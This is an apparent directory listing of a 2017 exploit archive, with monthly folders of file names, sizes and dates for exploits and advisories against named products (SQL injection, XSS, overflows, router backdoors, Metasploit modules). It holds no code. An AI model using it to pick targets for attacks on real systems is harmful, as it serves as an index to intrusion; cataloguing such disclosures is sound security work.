phpmyfaq298-xss.txt 09/21/2017 12:22 AM 3,248 pixie-ssrf.txt 09/07/2017 02:00 PM 4,691 plugx.rb.txt 09/11/2017 05:44 AM 1,538 psbs10-sql.txt 09/14/2017 11:33 PM 970 ptcksv1script-sql.txt 09/29/2017 11:10 PM 3,862 qmail_bash_env_exec.rb.txt 09/29/2017 03:44 PM 754 roteadorintelbras-bypass.txt 09/04/2017 11:11 AM 4,275 rubygems-overwrite.tgz 09/11/2017 03:22 AM 1,015 rws10-sql.txt 09/13/2017 06:15 AM 7,242 SA-20170912-0.txt 09/15/2017 02:35 AM 8,621 SA-20170913-0.txt 09/15/2017 02:39 AM 4,866 SA-20170913-1.txt 09/15/2017 02:40 AM 5,961 SA-20170914-0.txt 09/15/2017 02:42 AM 6,086 SA-20170914-1.txt 09/29/2017 11:35 PM 1,178 sdsn13-sql.txt 09/22/2017 04:55 PM 1,198 sececom102-sql.txt 10/01/2017 12:23 AM 6,388 SGMA17-002.txt 09/14/2017 11:47 PM 3,410 sielcosistemiwinlog20716-overflow.rb.txt 09/27/2017 05:22 AM 2,763 sitefinity-xss.txt 09/29/2017 09:22 PM 12,920 snpr20173hf1-dos.txt 09/29/2017 09:20 PM 2,583 snpr20173hf1-xss.txt 09/02/2017 02:22 PM 1,891 soa30-shell.txt 09/29/2017 11:34 PM 1,162 ssdsp10-sql.txt 09/29/2017 11:42 PM 1,834 ssns10-sql.txt 09/07/2017 02:06 PM 5,902 struts2_rest_xstream.rb.txt 09/07/2017 02:03 AM 2,438 subrioncms415-xss.txt 09/25/2017 05:16 PM 6,052 supervisor_xmlrpc_exec.rb.txt 09/19/2017 04:23 PM 712 suseportus22-xss.txt 09/11/2017 11:11 AM 5,781 tcprewrite-overflow.txt 09/01/2017 02:33 PM 1,291 teracopyservice31-escalate.txt 09/09/2017 11:33 AM 1,410 topsites10-xsrfexec.txt 09/29/2017 11:42 PM 670 tpanel2009-sql.txt 09/29/2017 07:32 PM 3,704 TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt 09/29/2017 08:15 PM 2,734 TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt 09/29/2017 10:23 PM 2,281 ucopiawa-escalate.txt 09/29/2017 10:18 PM 2,688 ucopiawa-escape.txt 09/06/2017 12:23 AM 1,223 uhrs12-xsstraversal.txt 09/01/2017 11:22 PM 1,108 usb-safely-eject-5.5-dos.py.txt 09/19/2017 03:30 PM 1,763 utstar-bypass.txt 09/29/2017 11:44 PM 1,136 vastalitechddz099-sql.txt 09/15/2017 02:04 AM 2,466 vipa-overflow.rb.txt 09/04/2017 04:22 PM 9,237 VL-1941.txt 09/04/2017 05:00 PM 14,975 VL-2074.txt 09/04/2017 02:11 AM 5,863 VL-2085.txt 09/19/2017 03:37 PM 4,048 wgfx-dos.txt 09/11/2017 01:12 PM 5,385 wisegiganas-lfiexecxsrf.txt 09/20/2017 10:34 PM 937 wp2kb-xss.txt 09/06/2017 01:01 AM 1,519 wpadspro34-sqlxss.txt 09/27/2017 12:22 AM 943 wpams-sql.txt 09/07/2017 03:22 AM 1,635 wpcf7ismi-xss.txt 09/07/2017 02:11 AM 2,423 wpcfs10-xss.txt 09/27/2017 02:33 PM 933 wpchurch-sql.txt 09/28/2017 01:52 AM 2,230 wpcontentaudit191-xsrfxss.txt 09/08/2017 03:22 PM 1,215 wpfttmp108-xss.txt 09/06/2017 01:32 AM 1,612 wpgms-execxss.txt 09/26/2017 06:44 PM 908 wpgym-sql.txt 09/26/2017 08:22 PM 915 wphms-sql.txt 09/21/2017 07:02 PM 3,117 wprig118-sql.txt 09/26/2017 07:32 PM 911 wpsms-sql.txt 09/04/2017 03:59 PM 1,003 wrbe126-exec.txt 09/15/2017 03:59 PM 934 xyzautoclassifieds10-sql.txt 09/29/2017 11:44 AM 1,376 zeebuddy2x-sql.txt 09/19/2017 03:28 PM 2,151 zktecozktimeweb2-disclose.txt 09/19/2017 03:26 PM 3,817 zktecozktimeweb2-xsrf.txt 09/26/2017 12:55 AM 12,158 ZSL-2017-5434.txt 09/26/2017 12:57 AM 1,683 ZSL-2017-5435.txt 09/26/2017 12:58 AM 1,757 ZSL-2017-5436.txt 09/26/2017 12:45 AM 1,924 ZSL-2017-5437.txt 09/26/2017 12:54 AM 3,168 ZSL-2017-5438.txt 09/29/2017 08:27 PM 2,147 zyxelp2812hnuf1-exec.txt 254 File(s) 57,142,523 bytes Directory of \2017-exploits\1710-exploits 11/01/2017 05:30 PM <DIR> . 11/01/2017 05:30 PM <DIR> .. 11/01/2017 05:29 PM 1,964,545 1710-exploits.tgz 10/16/2017 06:32 PM 2,962 3cx-traversal.txt 10/18/2017 11:22 PM 13,554 apachesolr701-xxe.txt 10/04/2017 02:11 AM 985 apachetomcat-bypassexec.txt 10/25/2017 01:02 AM 1,793 argosoftmms1002-dos.txt 10/09/2017 03:44 PM 3,087 asxmp3converter-overflow.txt 10/12/2017 09:22 AM 2,974 asxmpe3137-overflow.txt 10/10/2017 06:32 PM 6,177 atomcat-uploadexec.txt 10/25/2017 05:11 AM 2,434 ayukovnftp-overflow.txt 10/12/2017 05:44 AM 13,053 binutils229-overflow.tgz 10/12/2017 05:00 PM 15,982 bypassuac_injection_winsxs.rb.txt 10/18/2017 02:02 PM 1,620 careerportal10-sql.txt 10/04/2017 04:33 AM 1,895 clipbucket283-exec.txt 10/10/2017 06:22 PM 1,215 clipshare70-sql.txt 10/10/2017 09:22 AM 3,042 cms-harcodedsql.txt 10/25/2017 05:01 AM 2,474 cometchat-lfi.txt 10/02/2017 12:16 AM 1,202 ctvdc141-download.txt 10/01/2017 11:32 AM 3,835 CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt 10/14/2017 10:16 PM 5,553 CVE-2017-15012.py.txt 10/14/2017 10:13 PM 10,288 CVE-2017-15013.py.txt 10/14/2017 10:12 PM 5,510 CVE-2017-15014.py.txt 10/14/2017 10:08 PM 7,605 CVE-2017-15276.py.txt 10/26/2017 04:13 AM 2,323 CVE-2017-5223.txt 10/27/2017 04:55 PM 2,705 dameware12-exec.txt 10/04/2017 05:22 AM 3,968 dbe-overflow.txt 10/10/2017 09:09 PM 4,405 DC-2017-01-001.txt 10/10/2017 09:08 PM 5,003 DC-2017-01-013.txt 10/05/2017 04:33 AM 374,006 DC-2017-09-001_Magento_CSRF_Stored_Cross_Site_Scripting.pdf 10/05/2017 12:03 AM 377,392 DC-2017-09-002_Magento_CSRF_Stored_Cross_Site_Scripting.pdf 10/02/2017 04:33 AM 4,043 dnsmask-underflow.txt 10/02/2017 09:32 AM 3,466 dnsmasq-disclose.txt 10/02/2017 05:22 PM 7,795 dnsmasq2byte-overflow.txt 10/02/2017 03:44 PM 5,753 dnsmasqheap-overflow.txt 10/02/2017 06:22 AM 1,824 dnsmasqlackoffree-dos.txt 10/02/2017 11:01 AM 5,783 dnsmasqsb-overflow.txt 10/13/2017 06:55 AM 589 dreambox200be-xss.txt 10/13/2017 09:32 PM 1,347 duckietvcms115-lfi.txt 10/03/2017 08:11 PM 1,610 e2openwebif-exec.txt 10/25/2017 01:04 AM 2,015 easympegtodvd-overflow.py.txt 10/04/2017 03:22 AM 1,548 epesi182-xss.txt 10/03/2017 09:22 PM 6,574 ersdatasystem-deserialize.txt 10/13/2017 02:59 PM 5,054 esiclivrecms-sqlxss.txt 10/02/2017 12:26 AM 18,280 Excel_PoC.zip 10/04/2017 04:01 AM 1,191 fiberhomean550604f-exec.txt 10/25/2017 05:10 AM 1,534 fsamazonclone-sql.txt 10/25/2017 05:10 AM 1,007 fsbookstore-sql.txt 10/26/2017 03:50 AM 1,106 fscareclone-sql.txt 10/24/2017 05:44 AM 1,619 fscarrental-sql.txt 10/26/2017 03:48 AM 1,060 fscrowdfunding-sql.txt 10/25/2017 05:14 AM 1,324 fsebayclone-sql.txt 10/24/2017 04:33 AM 1,375 fsexpediaclone-sql.txt 10/25/2017 04:56 AM 1,596 fsfds-sql.txt 10/24/2017 12:02 AM 1,248 fsfreelancerclone-sql.txt 10/24/2017 03:02 PM 1,173 fsgrouponclone-sql.txt 10/24/2017 03:02 PM 1,324 fsindiamartclone-sql.txt 10/24/2017 09:22 AM 967 fslyndaclone-sql.txt 10/26/2017 03:50 AM 1,006 fsmonsterclone-sql.txt 10/25/2017 05:15 AM 1,023 fsolxclone-sql.txt 10/26/2017 03:48 AM 1,168 fsrealtorclone-sql.txt 10/26/2017 03:53 AM 1,489 fsshutterstockclone-sql.txt 10/26/2017 03:52 AM 1,027 fsthumbtackclone-sql.txt 10/26/2017 03:51 AM 1,098 fstrademeclone-sql.txt 10/03/2017 06:22 PM 573 GS20171004140626.txt 10/14/2017 10:31 PM 2,202 GS20171014213118.tgz 10/14/2017 10:32 PM 4,308 GS20171014213228.txt 10/14/2017 10:38 PM 1,259 GS20171014213716.txt 10/14/2017 10:39 PM 1,828 GS20171014213919.txt 10/16/2017 03:02 PM 2,181 GS20171017140123.tgz 10/19/2017 04:33 AM 4,926 GS20171019143149.tgz 10/18/2017 11:22 PM 6,122 hashicorp4024-escalate.txt 10/02/2017 12:18 AM 1,045 hbgkdvr300-bypass.txt 10/26/2017 09:22 PM 347,628 hitmanpro-overflow.tgz 10/10/2017 09:02 PM 1,887 ibmnotesencodeuri-dos.rb.txt 10/31/2017 02:33 PM 2,910 janktekjtc200-xsrfauth.txt 10/23/2017 03:22 PM 2,134 kaltura-exec.txt 10/25/2017 02:45 PM 1,631 keystonejs400beta5-inject.txt 10/25/2017 02:47 PM 1,571 keystonejs400beta5-xss.txt 10/25/2017 05:33 AM 7,596 KL-001-2017-017.txt 10/25/2017 05:51 AM 9,750 KL-001-2017-018.txt 10/25/2017 05:53 AM 5,148 KL-001-2017-019.txt 10/25/2017 05:56 AM 6,425 KL-001-2017-020.txt 10/25/2017 05:58 AM 11,591 KL-001-2017-021.txt 10/06/2017 10:33 PM 3,963 lansweeper-xxe.txt 10/05/2017 09:22 PM 3,942 lansweeper60063-xss.txt 10/25/2017 01:02 AM 3,418 linux4140rc4-escalate.txt 10/02/2017 04:02 AM 5,136 linuxkernel414rc3-dos.txt 10/28/2017 09:22 PM 1,117 mitrastar-escalate.txt 10/20/2017 06:44 AM 1,474 mozff-dos.txt 10/19/2017 12:23 AM 5,615 MS-WINDOWS-GAME-DEFINITION-FILE-MAKER-v6.3.9600-XML-EXTERNAL-ENTITY.txt 10/03/2017 01:02 AM 7,315 msiisurlscan-bypass.txt 10/02/2017 12:24 AM 4,074 msoffice2007word-disclose.txt 10/02/2017 12:28 AM 3,993 msofficegroove-bypassexec.txt 10/26/2017 03:53 AM 2,012 muracms-ssrfxxe.txt 10/04/2017 03:00 PM 557 netgearreadynas14316-exec.txt 10/25/2017 04:54 AM 2,568 netgear_dgn1000_setup_unauth_exec.rb.txt 10/02/2017 05:44 AM 1,461 npmv-password.txt 10/25/2017 02:43 PM 5,429 ntlm-weakness.txt 10/12/2017 03:33 PM 1,375 octobercms10425-xss.txt 10/30/2017 03:22 AM 1,596 onlineexamtest-sql.txt 10/07/2017 04:52 PM 9,467 orientdb_exec.rb.txt 10/25/2017 03:11 AM 2,591 osticket1101-shell.txt 10/30/2017 04:01 AM 1,420 phpinventory-upload.txt 10/13/2017 12:37 AM 156,459 phpmelody-sqlxss.pdf 10/25/2017 05:23 AM 1,584 phpmelody261-sql.txt 10/02/2017 12:14 AM 1,185 phpmvs102-sql.txt 10/13/2017 02:48 PM 1,143 phpmyfaq298title-xss.txt 10/27/2017 06:48 PM 4,792 piaandroid-dos.txt 10/21/2017 05:29 PM 7,373 polycom_hdx_auth_bypass.rb.txt 10/10/2017 08:57 PM 7,102 postgreswin-dllhijack.txt 10/31/2017 02:44 PM 3,654 progeamovicon-unquoted.txt 10/09/2017 04:00 PM 948 pyrobatchftp317-overflow.txt 10/14/2017 11:11 AM 922 quickcms64-sql.txt 10/07/2017 04:49 PM 1,488 R7-2017-22.txt 10/09/2017 12:23 AM 9,077 rancher_server.rb.txt 10/20/2017 12:33 AM 6,748 RCESEC-2017-001.txt 10/14/2017 10:19 PM 4,210 RCESEC-2017-002.txt 10/02/2017 12:15 AM 1,206 remlmps10-sql.txt 10/16/2017 02:50 PM 10,978 SA-20171016-0.txt 10/17/2017 02:54 PM 6,660 SA-20171017-0.txt 10/18/2017 12:23 AM 9,963 SA-20171018-0.txt 10/18/2017 12:01 AM 18,899 SA-20171018-1.txt 10/02/2017 12:10 AM 2,913 sbe10028-overflow.txt 10/12/2017 11:11 AM 5,412 sbe10116-overflow.txt 10/05/2017 05:22 AM 1,342 smartbearsoapui-exec.txt 10/02/2017 12:11 AM 3,267 smarterstats1136347-xss.txt 10/31/2017 02:44 PM 3,318 spidercontrol-mismanagement.txt 10/10/2017 09:00 PM 32,679 subarufobrob-keyfob.zip 10/13/2017 02:42 PM 3,238 sync_breeze_enterprise.rb.txt 10/27/2017 06:02 PM 8,184 tizenstudio13-overflow.txt 10/12/2017 04:59 PM 3,034 tomcat_jsp_upload_bypass.rb.txt 10/21/2017 05:24 PM 9,030 tplink-exec.txt 10/12/2017 05:00 PM 4,591 trendmicro_imsva_widget_exec.rb.txt 10/10/2017 09:22 PM 8,186 trendmicro_officescan_widget_exec.rb.txt 10/13/2017 02:41 PM 770 typo3restler-disclose.txt 10/05/2017 04:06 AM 942 ucopiawa-exec.txt 10/21/2017 05:33 PM 3,037 ueb9_api_storage.rb.txt 10/21/2017 05:30 PM 3,531 ueb9_bpserverd.rb.txt 10/05/2017 12:23 AM 3,946 unitrendsueb91-bypassexec.txt 10/04/2017 09:22 PM 6,236 unitrendsueb91-escalate.txt 10/05/2017 11:11 AM 5,103 unitrendsueb91-exec.txt 10/30/2017 05:03 AM 2,831 vastalitechagent-sql.txt 10/12/2017 10:22 AM 4,464 vxsearchent10112-overflow.txt 10/27/2017 04:22 PM 5,188 watchdogdam-null.txt 10/16/2017 02:48 PM 4,771 WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt 10/30/2017 05:44 AM 1,282 websitebroker-sql.txt 10/06/2017 04:33 AM 23,930 wildpool-overflow.tgz 10/06/2017 07:32 PM 2,370 wp482-failedexpiry.txt 10/18/2017 01:01 PM 1,122 wpcarparkbooking-sql.txt 10/16/2017 10:22 AM 1,185 wpimprs22-xss.txt 10/22/2017 12:11 PM 2,813 wppolls124-sql.txt 10/12/2017 02:42 PM 1,134 wppootlebutton111-xss.txt 10/12/2017 02:43 PM 1,363 wppopcash10-xss.txt 10/04/2017 02:59 PM 461 wpsmushimage-traversal.txt 10/10/2017 09:04 PM 1,650 wptrega100-xss.txt 10/31/2017 03:44 PM 2,958 wpulf152-xss.txt 10/30/2017 03:22 AM 2,520 wpupc4224-inject.txt 10/14/2017 10:23 PM 6,210 X41-2017-008.txt 10/14/2017 10:27 PM 3,020 X41-2017-010.txt 10/12/2017 04:42 PM 493,259 xcart-inject.pdf 10/20/2017 02:55 PM 2,248 zktimews20-insecure.txt 10/20/2017 02:54 PM 3,745 zktimews20-xsrf.txt 10/30/2017 04:33 AM 1,589 zomatoclone-sql.txt 10/24/2017 07:26 AM 3,289 ZSL-2017-5439.txt 163 File(s) 4,358,393 bytes Directory of \2017-exploits\1711-exploits 12/01/2017 04:03 AM <DIR> . 12/01/2017 04:03 AM <DIR> .. 12/01/2017 12:55 AM 236,968 1711-exploits.tgz 11/07/2017 04:58 PM 1,134 actiontecc1000a-backdoor.txt 11/02/2017 05:07 PM 1,089 aroxschoolerpphp-sql.txt 11/29/2017 10:23 PM 4,423 asterisk13172-dos.txt 11/05/2017 04:42 PM 5,032 AVAYA-OFFICE-IP-IPO-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt 11/05/2017 04:40 PM 5,523 AVAYA-OFFICE-IP-IPO-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt 11/15/2017 05:57 PM 3,353 avgater-flaw.txt 11/11/2017 07:22 PM 3,577 aztech-bypass.txt 11/02/2017 04:55 PM 1,592 basicb2b-sql.txt 11/02/2017 04:56 PM 1,126 cmslite14-sql.txt 11/23/2017 11:11 AM 5,398 communigatepro-xss.txt 11/06/2017 05:44 AM 56,926 coolplayer-2.19.6-bindshell-exploit.py.txt 11/02/2017 04:54 PM 1,072 cpaleadreward-sql.txt 11/23/2017 01:11 PM 709 csccart462-exec.txt 11/22/2017 04:40 PM 3,176 CSNC-2017-029.txt 11/22/2017 04:41 PM 4,527 CSNC-2017-030.txt 11/17/2017 05:20 PM 1,258 CVE-2017-5124-master.zip 11/12/2017 02:13 PM 4,155 CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt 11/08/2017 11:22 PM 7,828 cve_2017_8464_lnk_lpe.rb.txt 11/07/2017 02:01 AM 2,222 debutembeddedhttpd120-dos.txt 11/17/2017 03:22 PM 2,916 dell-escalate.txt 11/27/2017 09:22 PM 2,763 divinglog6-xxe.txt 11/23/2017 10:22 AM 2,339 dlink-850-admin-creds-retriever.sh.txt 11/17/2017 03:55 PM 4,423 dlinkdc936l-xsrf.txt 11/16/2017 01:45 AM 906 dlinkdir605l208-dos.txt 11/14/2017 05:44 AM 7,179 dlink_dir850l_unauth_exec.rb.txt 11/06/2017 03:22 AM 1,196 dmb23-dllhijack.txt 11/15/2017 01:22 AM 3,305 dupscout10018-overflow.txt 11/27/2017 11:22 PM 2,116 exim489-dos.txt 11/02/2017 04:53 PM 1,654 fakemagazinecover-sql.txt 11/06/2017 08:02 AM 4,356 freefloatftpd-exploit.py.txt 11/09/2017 12:44 AM 10,509 geutebrueck_gcore_x64_rce_bo.rb.txt 11/03/2017 05:22 AM 8,902 graphicsmagick-discloseoverflow.txt 11/10/2017 07:15 PM 4,904 GS20171110181405.txt 11/15/2017 06:04 PM 1,763 GS20171115170453.tgz 11/15/2017 06:06 PM 3,039 GS20171115170601.tgz 11/15/2017 06:07 PM 6,675 GS20171115170716.tgz 11/16/2017 01:38 AM 4,834 GS20171116003633.txt 11/16/2017 01:39 AM 8,060 GS20171116003938.txt 11/16/2017 01:41 AM 1,186 GS20171116004108.txt 11/16/2017 01:43 AM 1,219 GS20171116004241.txt 11/21/2017 08:14 PM 4,738 GS20171121191436.tgz 11/21/2017 08:16 PM 2,695 GS20171121191617.tgz 11/22/2017 04:44 PM 33,164 GS20171122154332.txt 11/22/2017 04:46 PM 30,799 GS20171122154609.txt 11/22/2017 04:48 PM 28,866 GS20171122154803.txt 11/22/2017 04:53 PM 24,373 GS20171122155126.txt 11/22/2017 04:55 PM 17,647 GS20171122155447.txt 11/22/2017 04:56 PM 21,513 GS20171122155626.txt 11/22/2017 04:58 PM 16,118 GS20171122155815.txt 11/22/2017 05:11 PM 20,854 GS20171122160017.txt 11/25/2017 04:02 PM 31,165 GS20171125145922.txt 11/25/2017 04:05 PM 26,653 GS20171125150442.txt 11/25/2017 04:06 PM 4,272 GS20171125150614.txt 11/25/2017 04:07 PM 1,817 GS20171125150745.txt 11/25/2017 04:09 PM 4,590 GS20171125150941.txt 11/25/2017 04:11 PM 1,169 GS20171125151104.txt 11/25/2017 04:15 PM 2,070 GS20171125151523.txt 11/28/2017 03:44 PM 1,912 GS20171128144437.tgz 11/30/2017 09:32 PM 2,964 GS20171201024948.tgz 11/28/2017 03:44 PM 3,461 hikvision-roguessid.txt 11/30/2017 08:02 PM 2,366 HugeDirtyCowPOC-master.zip 11/08/2017 02:34 PM 1,839 ibmlotusnotes-dos.rb.txt 11/13/2017 11:01 AM 8,842 ikarus2167-escalate.txt 11/04/2017 12:22 AM 581 ipswitchwsftpprof-overflow.txt 11/02/2017 05:02 PM 1,179 isms230-sql.txt 11/13/2017 05:02 PM 1,087 kirbycms-xss.txt 11/04/2017 12:44 AM 3,950 KL-001-2017-022.txt 11/07/2017 05:00 PM 29,120 linux413smepsmap-escalate.txt 11/07/2017 05:09 PM 1,115 lms790-xss.txt 11/09/2017 12:40 AM 4,315 makoserver_cmd_exec.rb.txt 11/06/2017 03:22 AM 3,199 meaam13-sql.txt 11/07/2017 03:22 AM 6,994 mkvalidator-dos.tgz 11/13/2017 01:12 PM 1,234 monstra304-xss.txt 11/02/2017 04:57 PM 1,216 mymagazineblogcms10-sql.txt 11/02/2017 04:58 PM 1,196 newsmagblogcms10-sql.txt 11/02/2017 05:06 PM 1,244 newspapermbcms10-sql.txt 11/02/2017 04:53 PM 856 nicephpfaq-sql.txt 11/02/2017 05:01 PM 2,559 octobercms10426-xsrf.txt 11/02/2017 05:28 PM 5,151 oraclejavase-xxedisclose.txt 11/03/2017 04:33 AM 11,660 oraclepsept-exec.txt 11/07/2017 03:44 PM 1,585 pfsense2311-exec.txt 11/28/2017 09:03 PM 6,101 pfsense_group_member_exec.rb.txt 11/17/2017 11:11 AM 9,225 phpmyfaq2.9.9-exec.txt 11/02/2017 05:14 PM 1,332 protectedlinks-sql.txt 11/29/2017 04:33 AM 1,006 qemunbd-overflow.txt 11/29/2017 10:30 PM 1,864 root_no_password.rb.txt 11/03/2017 03:25 PM 9,151 rt-sa-2016-008.txt 11/14/2017 04:17 PM 6,224 SA-20171114-0.txt 11/17/2017 05:16 PM 7,577 SA-20171116-0.txt 11/18/2017 06:44 AM 802 schoolcms100-upload.txt 11/18/2017 06:55 AM 1,183 schoolcms100-xss.txt 11/03/2017 12:42 AM 1,782 sera_1.2.sh.txt 11/02/2017 05:04 PM 842 shareet-sql.txt 11/05/2017 11:11 AM 544 smplayer17110-dos.txt 11/29/2017 04:55 PM 2,048 synologysm52-exec.txt 11/18/2017 04:33 AM 9,903 tic-overflow.tgz 11/03/2017 03:32 PM 2,352 tnftp_savefile.rb.txt 11/15/2017 02:24 AM 4,144 ulterius-traversal.txt 11/02/2017 05:04 PM 1,215 uszipcodesdb-sql.txt 11/02/2017 09:22 PM 8,511 viritexplorer-escalate.txt 11/15/2017 05:58 PM 5,210 vivotekip-overflow.txt 11/17/2017 05:18 PM 11,052 vxsearch10214-overflow.py.txt 11/06/2017 04:02 AM 1,294 web2project33-xss.txt 11/13/2017 10:11 AM 9,689 webviewer100193-upload.rb.txt 11/01/2017 02:33 PM 2,170 whatsapp21752-dos.txt 11/14/2017 04:02 PM 1,431 wpaafcbp13-xss.txt 11/14/2017 04:03 PM 789 wpamptoolbox194-xss.txt 11/18/2017 11:22 PM 1,191 wpamtythumb813-xss.txt 11/13/2017 06:02 PM 1,274 wpappointments2222-xss.txt 11/21/2017 08:04 PM 777 wpaptr11-xss.txt 11/13/2017 09:22 PM 704 wpboozang100-xss.txt 11/22/2017 04:38 PM 1,250 wpbreezingforms12742-xss.txt 11/13/2017 07:22 PM 1,154 wpcartogiraffemap10-xss.txt 11/14/2017 04:04 PM 1,273 wpdfdreddcointips111-xss.txt 11/21/2017 08:06 PM 777 wpemagmc10-xss.txt 11/21/2017 11:11 AM 1,553 wpinlink10-sql.txt 11/03/2017 11:21 AM 1,297 wpjtrtrt41-sql.txt 11/07/2017 09:13 PM 1,818 wpmigration1228-xss.txt 11/09/2017 01:12 PM 806 wpshtml5vp314-xss.txt 11/10/2017 06:45 PM 3,219 wpuif12-xss.txt 11/07/2017 02:22 AM 1,416 wpuserpro-bypass.txt 11/30/2017 07:32 PM 1,084 wpwoocommerce2030-traversal.txt 11/22/2017 04:35 PM 2,957 wpyoastseo-xss.txt 11/03/2017 03:30 PM 3,960 wp_mobile_detector_upload_execute.rb.txt 11/10/2017 11:22 PM 4,873 X41-2017-006.txt 11/13/2017 06:02 PM 1,284 xlightftp3885-overflow.txt 11/30/2017 02:40 PM 2,132 zktimeweb20112280-xsrf.txt 11/30/2017 02:39 PM 810 zktimeweb20112280-xss.txt 11/15/2017 02:19 AM 3,142 ZSL-2017-5440.txt 11/27/2017 02:22 PM 748 ztezxdsl831-bypass.txt 11/02/2017 04:59 PM 1,066 zyxelpk5001z-backdoor.txt 132 File(s) 955,466 bytes Directory of \2017-exploits\1712-exploits 01/01/2018 03:38 AM <DIR> . 01/01/2018 03:38 AM <DIR> .. 01/01/2018 03:37 AM 853,988 1712-exploits.tgz 12/20/2017 05:03 PM 1,357 abilitymailserver332-xss.txt 12/01/2017 08:32 PM 6,819 ABYSS-WEB-SERVER-MEMORY-HEAP-CORRUPTION.txt 12/13/2017 04:22 AM 1,507 accesspressapp-upload.txt 12/11/2017 03:54 PM 3,501 advanceb2bscript213-sql.txt 12/11/2017 03:55 PM 2,525 advanceolms31-sql.txt 12/13/2017 06:29 PM 5,166 advantech_webaccess_webvrpcs_bof.rb.txt 12/11/2017 03:56 PM 830 affiliatemlmscript10-sql.txt 12/31/2017 06:55 AM 1,334 agds1-xss.txt 12/28/2017 05:44 AM 2,364 allmediaserver095-overflow.rb.txt 12/27/2017 02:11 AM 1,267 allmediaserver095-overflow.txt 12/04/2017 02:42 PM 2,373 amazonaudible-escalate.txt 12/12/2017 05:56 AM 3,875 ares407-sql.txt 12/05/2017 12:02 AM 2,010 arq596-escalate.txt 12/05/2017 04:33 AM 2,963 arq597-escalate.txt 12/01/2017 07:44 PM 3,518 ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt 12/12/2017 06:00 AM 1,059 awd205-sql.txt 12/01/2017 04:33 AM 8,822 awscfnbootstrap-exec.txt 12/01/2017 03:22 PM 3,812 Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt 12/11/2017 04:03 PM 1,023 basicb2bscript208-sql.txt 12/12/2017 06:02 AM 998 basicjobsite205-sql.txt 12/11/2017 03:59 PM 1,802 beautyparlourbs10-sql.txt 12/20/2017 05:11 PM 1,631 beimscw51800-sql.txt 12/26/2017 07:22 AM 679 biometricshiftems30-disclose.txt 12/30/2017 04:45 PM 1,290 bitcoincashrp10-xss.txt 12/19/2017 03:26 PM 1,344 brightsignds-xsstraversalupload.txt 12/15/2017 06:06 PM 922 busbookingscript10-sql.txt 12/10/2017 11:01 PM 901 cabbooking10-sql.txt 12/12/2017 05:58 AM 663 carrentalscript204-sql.txt 12/18/2017 11:02 AM 652 cdex196-overflow.txt 12/11/2017 03:51 PM 939 charteredabs10-sql.txt 12/11/2017 03:51 PM 892 childcarescript10-sql.txt 12/05/2017 06:22 PM 7,798 claymoredualeth-overflow.txt 12/11/2017 03:50 PM 654 cmsauditorwebsite10-sql.txt 12/26/2017 11:11 AM 3,353 comtrend5367-exec.txt 12/11/2017 03:59 PM 856 consumercomplaintsclone10-sql.txt 12/17/2017 04:21 PM 5,039 CONVISO-17-002.txt 12/17/2017 04:23 PM 4,903 CONVISO-17-003.txt 12/22/2017 05:19 PM 17,489 CORE-2017-0008.txt 12/11/2017 03:50 PM 683 coworkspacesearch10-sql.txt 12/31/2017 06:56 AM 1,688 csphpamj-shell.txt 12/31/2017 06:22 AM 1,407 csphpamj-xss.txt 12/18/2017 09:22 PM 9,791 CVE-2017-17562.tgz 12/31/2017 04:31 PM 665 d3dgear500-overflow.txt 12/20/2017 02:30 AM 3,718 DC-2017-12-003.txt 12/20/2017 02:31 AM 4,119 DC-2017-12-004.txt 12/20/2017 02:32 AM 6,651 DC-2017-12-005.txt 12/11/2017 04:00 PM 896 doctorsearch10-sql.txt 12/08/2017 02:11 AM 1,506 domainsalephpscript10-sql.txt 12/27/2017 11:44 AM 3,762 dotnetnukedreamslider010102-disclose.rb.txt 12/13/2017 06:30 PM 2,465 dup_scout_enterprise_login_bof.rb.txt 12/31/2017 04:36 PM 1,286 easywebgrabber1-xss.txt 12/12/2017 05:56 AM 1,193 ebbs304-sql.txt 12/11/2017 03:57 PM 1,509 ecommlmsoftware10-sql.txt 12/11/2017 04:00 PM 1,194 ejbs206-sql.txt 12/29/2017 03:24 PM 7,836 epmp1000_get_chart_cmd_shell.rb.txt 12/29/2017 03:25 PM 7,904 epmp1000_ping_cmd_shell.rb.txt 12/11/2017 03:57 PM 1,003 eventcalcatscript10-sql.txt 12/11/2017 04:34 PM 916 facebookclonescript10-sql.txt 12/11/2017 04:35 PM 1,334 foodorderscript10-sql.txt 12/11/2017 04:36 PM 2,354 foodspottingclonescript10-sql.txt 12/11/2017 04:36 PM 4,719 freelancewebsitescript206-sql.txt 12/11/2017 03:56 PM 928 fsamazonclone10-sql.txt 12/11/2017 03:56 PM 645 fscareclone10-sql.txt 12/11/2017 03:55 PM 1,296 fscrowdfundingscript10-sql.txt 12/11/2017 04:03 PM 2,102 fsebayclone10-sql.txt 12/11/2017 03:53 PM 3,947 fsexpediaclone10-sql.txt 12/06/2017 11:32 AM 959 fsfacebookclone-sql.txt 12/11/2017 03:54 PM 1,128 fsfoodpandaclone10-sql.txt 12/11/2017 04:02 PM 1,208 fsfreelancerclone10-sql.txt 12/11/2017 04:02 PM 2,096 fsgigsscript10-sql.txt 12/11/2017 04:02 PM 1,691 fsgrouponclone10-sql.txt 12/11/2017 04:01 PM 1,088 fsgrubhubclone10-sql.txt 12/06/2017 11:32 AM 1,069 fsimdbclone-sql.txt 12/11/2017 04:01 PM 2,394 fsimdbclone10-sql.txt 12/11/2017 03:58 PM 3,556 fsindiamartclone10-sql.txt 12/11/2017 03:58 PM 2,378 fslinkedinclone10-sql.txt 12/15/2017 06:06 PM 941 fslyndaclone10-sql.txt 12/10/2017 10:59 PM 1,892 fsmakemytripclone10-sql.txt 12/06/2017 02:13 PM 819 fsmmtc-sql.txt 12/08/2017 08:02 AM 1,040 fsmonsterclone10-sql.txt 12/08/2017 08:02 AM 1,917 fsolxclone10-sql.txt 12/08/2017 07:02 AM 803 fsquibidsclone10-sql.txt 12/08/2017 06:22 